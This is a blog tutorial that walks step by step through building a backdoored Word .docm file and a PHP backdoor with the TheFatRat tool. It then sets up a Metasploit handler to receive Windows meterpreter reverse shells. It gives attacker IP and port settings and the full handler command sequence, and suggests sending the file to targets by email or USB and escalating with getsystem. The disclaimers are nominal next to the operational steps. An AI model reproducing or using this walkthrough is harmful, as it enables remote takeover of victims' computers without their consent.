Back
hacking windows with fatrat

How To exploit Windows Systems with FATRAT & a .doc file

Microsoft Office is by far the most used office tool for creating and editing .doc files. But is it as secure as everyone thinks or Can hackers hack and exploit Windows 10 with Microsoft Word (.doc file)?

I mean what can an innocent-looking .doc file do to exploit your system. Turns out quite a lot. This tutorial will show you how a malicious .doc file and a Windows system compromise give shell access to attackers on the internet.

Note: I have tested this exploit on office 2007, and it works perfectly. Higher versions not so much. The latest versions are safe from this exploit.

Table of contents

What is FATRAT Hacking tool?

FATRAT is a remote administration framework used to make rat applications and rat apk files with reverse shells that can be used for controlling devices remotely. By using FATRAT, we can hack any of the most used operating systems like Windows, iOS, Android, and Mac. Today we will hack windows 10. So let’s hack windows with Microsoft office.

Hacking Windows with FATRAT and MS Office Exploit

Disclaimer:

Please be aware that exploiting or testing any device is illegal unless you have permission from the owner and the parties involved. This post should be used as a tool to help people understand how hackers can exploit windows 10 devices with .doc files and tools such as FATRAT. We shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.

So let’s learn the steps to hack windows 10 with word files. So let’s start hacking.

Step 1: Open Kali terminal and clone FATRAT tool from Github

Git clone the following FATRAT repository from the Kali Linux terminal and run the following commands to setup FATRAT:

For cloning fatrat type

git clone https://github.com/Screetsec/TheFatRat.git

Then type cd TheFatRat

Step 2: Setup and give root and execution permissions

Give the FATRAT folder and the hacking script root permissions to compile and execute in Kali Linux. Use the following command:

fatrat hacking

chmod +x setup.sh

Step 3: Install FATRAT tool

Use the following command to start the installation of FATRAT in Kali Linux.

./setup.sh

Once fatrat is installed, you will see the following screen

Type y for yes so that you can run fatrat from any terminal.

CREATING MIRCOSOFT WORD EXPLOIT TO HACK WINDOWS

We will create a backdoor for the office using Microsoft. To select this windows backdoor hack

Type 7

the fatrat

Now we will create a backdoor with a word file and hack windows 10

Type 2         

hack windows

Now that you have chosen the exploit to use for the backdoor.

You have to give the necessary options and information for hacking windows 10

fatrat hacking windows

Enter LHOST listener/attacker IP address.

Type 192.168.1.12

Type port 4444 or any port number.

Enter backdoor file name testing file

Type 3 for using windows/meterpreter/reverse_tcp exploit.

Press enter to create a backdoor with the specified exploit.

After backdoor file is created, it will be saved in /home/user/Downloads/TheFatRat/output/testingfile.docm

hack windows

You can send the backdoor file over mail or sending it via a USB drive might work as well.

Step 5: Metasploit setup

Startup a terminal and type the following command to start Metasploit.

# msfconsole

Now in the Metasploit console type the following commands

hacking windows with fatrat

Use the below commands

firstly type this msf > use exploit/multi/handler

then type this msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

next this msf exploit(handler) > set lhost 192.168.182.136

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Note:

**lhost= YOUR IP address

**lport= 4444

Step 6: Exploit the target with the backdoor

Once the target clicks on the word file, the backdoor script will execute, and the meterpreter session will be opened in msfconsole, as shown below.

windows 10 hacking

The above victim is using Windows 10 system with office 2007 installed.

Type the “help” or “?” command to see all the possible options you can use on Metasploit for hacking windows systems.

Still not satisfied? Let’s do one more with a slight twist.

How to hack a window 10 with a .doc file

Step 1: Startup fatrat

hacking windows

Here, we will create a backdoor using PHP. Type 1

Create backdoor with msfvenom

Then type 12

windows fatrat hack

FATRAT.PHP BACKDOOR

Step 2: Enter the required details to set up the target

Enter

LAST 192.168.182.136

Then enter

port 4444

Type file name as textfile

hacking windows with fatrat

As shown, the backdoor for hacking windows with doc files will be created.

Step 3: Metasploit setup

Open up a Linux terminal and type the following command to start Metasploit.

# msfconsole

Now in the Msfconsole enter the commands:

MSF > use exploit/multi/handler

then type this: MSF exploit(handler) > set payload windows/meterpreter/reverse_tcp

after you are done with the previous one, do this: MSF exploit(handler) > set lhost 192.168.182.136

next this msf exploit(handler) > set lport 4444

then this, MSF exploit(handler) > exploit

Step 4: Exploit the victim

As the target victim opens the malicious doc file. The windows system will be hacked, and we will get a shell terminal with access to control the target system.

You will get a meterpreter shell on the Kali Linux terminal as shown below.

hacking windows with fatrat

You have now successfully exploited and hacked a WINDOWS 10 device using a word file.

Type the “help” command to show all the possible options for exploitation.

e.g. getsystem command can get you admin access.

So, this is how hackers can exploit windows with Microsoft word & the FATRAT tool.

Commonly asked questions about hacking windows with Word files:

Q1 Is hacking windows devices legal?

No, hack windows devices is not legal. We do not support hacking or exploiting devices. This post is just to show how hackers can exploit windows 10 systems and devices by using word files.

Q2 The word files I made are detected as a virus by antivirus. Am I safe?

Do not worry, you are safe. The alert is because you made your own virus, which is hidden in the word file. The antivirus software might detect the virus. Which only means you have a great antivirus. Cheers, and be glad.

Q3. How can I hack my friends/Spouses pc with this hack?

This hack is only for educational purposes, not for hacking people. We do not support any illegal hacking. Kindly refrain from such comments and requests. This tutorial is for educational purposes only.

Q4. Does it work on higher versions of Microsoft Word?

It works on some versions of Microsoft 2010. But after that, Microsoft has long since patched this exploit. So you are probably safe as long as you stay updated to the latest version.

Tag:, , , , ,

author avatar
shubham

You may also like

Data Breach (2)
Fileless Malware: Can I Be Hacked Without Any Interaction with an Unknown File?
7 September, 2023
Why Gamers Should Prioritize Online Safety
Gamers Should Prioritize Online Safety: 10 Tips to Stay Secure
5 September, 2023

Leave A Reply

Your email address will not be published. Required fields are marked *